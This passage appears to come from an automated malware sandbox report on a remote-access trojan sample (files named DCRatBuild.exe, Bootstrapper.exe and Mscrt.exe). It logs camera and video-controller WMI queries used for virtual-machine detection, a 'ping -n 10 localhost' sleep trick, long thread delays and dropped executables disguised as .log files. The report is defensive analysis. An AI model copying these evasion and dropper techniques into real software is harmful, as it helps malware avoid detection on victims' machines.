Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ComponentReviewperfmonitor\Mscrt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Memory allocated: 1901A610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Memory allocated: 190329B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Memory allocated: 1960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Memory allocated: 1B5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Memory allocated: 23A0000 memory reserve \| memory write watch
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Memory allocated: 1A5D0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599770	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599286	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597575	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597214	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596716	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596596	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595475	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595248	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594667	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594214	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594106	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593994	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593858	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593603	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593309	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593029	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592555	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592341	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 591981	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 600000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599891
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599781
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599672
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599562
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599453
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599219
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599109
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598891
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598781
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598672
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598562
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 3600000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598450
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598234
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598125
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598016
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597906
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597797
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597687
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597578
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597469
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597234
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597125
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597016
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596906
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596797
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596687
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596578
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596469
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596335
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596207
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596078
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595969
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595859
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595750
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595640
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595531
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595422
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595312
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595202
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595094
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594984
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594875
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594765
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594656

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Window / User API: threadDelayed 4010	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Window / User API: threadDelayed 5760	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Window / User API: threadDelayed 1515
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Window / User API: threadDelayed 8246

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DDhNlQcT.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AJexuQye.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uMgPgnwD.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rNSZpEdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mmsihreI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PAQlXkJO.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OUvvQGoW.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GSwVnIEh.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GtXEsNdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DuJNBeJX.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wAkXRBsB.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\McddlGOE.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XIYBqjjh.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WUTtFVnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XqUSVQdy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FwwvWNOS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TaRdOVJt.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TrGcehJI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pVzGKFEw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ASBxeDSb.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EvzfQQCl.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DXuFwIar.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oFVQTmjS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KjOuzKdG.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GoOOBNnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SedCyZmq.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lwQiRexF.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TRlucpWH.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KrxNetEL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yxUOovbm.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XMmLkVMA.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ohvyYrIy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rvLGajjL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cNwShBsX.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tPFHKnhJ.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cAEKMRbo.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kPeZMpiY.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JInMuEEa.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xxLgnBHw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\peXGurXs.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SDCUsTNK.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vDJPwBdH.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aLKjMSnc.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nkUqDrtD.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_3-23449

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -599770s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -599286s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598198s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597575s >= -30000s	Jump to behavior
